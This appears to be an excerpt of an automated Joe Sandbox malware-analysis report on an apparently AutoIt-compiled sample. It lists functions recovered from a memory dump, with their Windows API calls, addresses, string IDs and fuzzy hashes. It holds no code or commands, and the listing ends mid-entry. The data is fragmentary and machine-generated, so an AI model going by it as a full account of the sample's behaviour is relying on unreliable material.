                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: DestroyWindow
                                                                        • String ID: static
                                                                        • API String ID: 3375834691-2160076837
                                                                        • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                        • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                        • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                        • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                        • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DriveType
                                                                        • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                        • API String ID: 2907320926-3566645568
                                                                        • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                        • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                        • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                        • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                        APIs
                                                                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                        • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                        • DeleteObject.GDI32(?), ref: 00470A04
                                                                        • DestroyIcon.USER32(?), ref: 00470A1C
                                                                        • DeleteObject.GDI32(?), ref: 00470A34
                                                                        • DestroyWindow.USER32(?), ref: 00470A4C
                                                                        • DestroyIcon.USER32(?), ref: 00470A73
                                                                        • DestroyIcon.USER32(?), ref: 00470A81
                                                                        • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                        • String ID:
                                                                        • API String ID: 1237572874-0
                                                                        • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                        • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                        • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                        • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                        APIs
                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                        • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                        • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                        • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                        • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                        • VariantClear.OLEAUT32(?), ref: 00479489
                                                                        • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                        • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                        • String ID:
                                                                        • API String ID: 2706829360-0
                                                                        • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                        • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                        • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                        • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 0044480E
                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                        • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                        • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                        • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                        • GetKeyState.USER32(00000011), ref: 00444903
                                                                        • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                        • GetKeyState.USER32(00000012), ref: 0044492D
                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                        • GetKeyState.USER32(0000005B), ref: 00444958
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: State$Async$Keyboard
                                                                        • String ID:
                                                                        • API String ID: 541375521-0
                                                                        • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                        • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                        • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                        • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                        • String ID:
                                                                        • API String ID: 3413494760-0
                                                                        • Opcode ID: 6d788ec2be1997d9cec64eaa256864158e09ad3f6105efb05e468561ef8a9f6c
                                                                        • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                        • Opcode Fuzzy Hash: 6d788ec2be1997d9cec64eaa256864158e09ad3f6105efb05e468561ef8a9f6c
                                                                        • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                        • String ID: AU3_FreeVar
                                                                        • API String ID: 2634073740-771828931
                                                                        • Opcode ID: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                                                                        • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                        • Opcode Fuzzy Hash: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                                                                        • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                        APIs
                                                                        • CoInitialize.OLE32 ref: 0046C63A
                                                                        • CoUninitialize.OLE32 ref: 0046C645
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                          • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                        • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                        • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                        • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                        • API String ID: 2294789929-1287834457
                                                                        • Opcode ID: 8665205133a3f3d83065b0d9f42e266eef00d51d9f24292ab734099309a65fda
                                                                        • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                        • Opcode Fuzzy Hash: 8665205133a3f3d83065b0d9f42e266eef00d51d9f24292ab734099309a65fda
                                                                        • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                        APIs
                                                                          • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                          • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                          • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                        • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                        • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                        • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                        • ReleaseCapture.USER32 ref: 0047116F
                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                        • API String ID: 2483343779-2107944366
                                                                        • Opcode ID: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                                        • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                        • Opcode Fuzzy Hash: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                                        • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                        • _wcslen.LIBCMT ref: 00450720
                                                                        • _wcscat.LIBCMT ref: 00450733
                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                        • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window_wcscat_wcslen
                                                                        • String ID: -----$SysListView32
                                                                        • API String ID: 4008455318-3975388722
                                                                        • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                        • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                        • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                        • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                        APIs
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                        • GetParent.USER32 ref: 00469C98
                                                                        • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                        • GetParent.USER32 ref: 00469CBC
                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 2360848162-1403004172
                                                                        • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                        • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                        • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                        • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                        • String ID:
                                                                        • API String ID: 262282135-0
                                                                        • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                        • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                        • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                        • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                        • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                        • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                        • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                        • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$LongWindow
                                                                        • String ID:
                                                                        • API String ID: 312131281-0
                                                                        • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                        • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                        • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                        • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                        APIs
                                                                          • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                        • SendMessageW.USER32(769523D0,00001001,00000000,?), ref: 00448E16
                                                                        • SendMessageW.USER32(769523D0,00001026,00000000,?), ref: 00448E25
                                                                          • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                        • String ID:
                                                                        • API String ID: 3771399671-0
                                                                        • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                        • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                        • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                        • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00434643
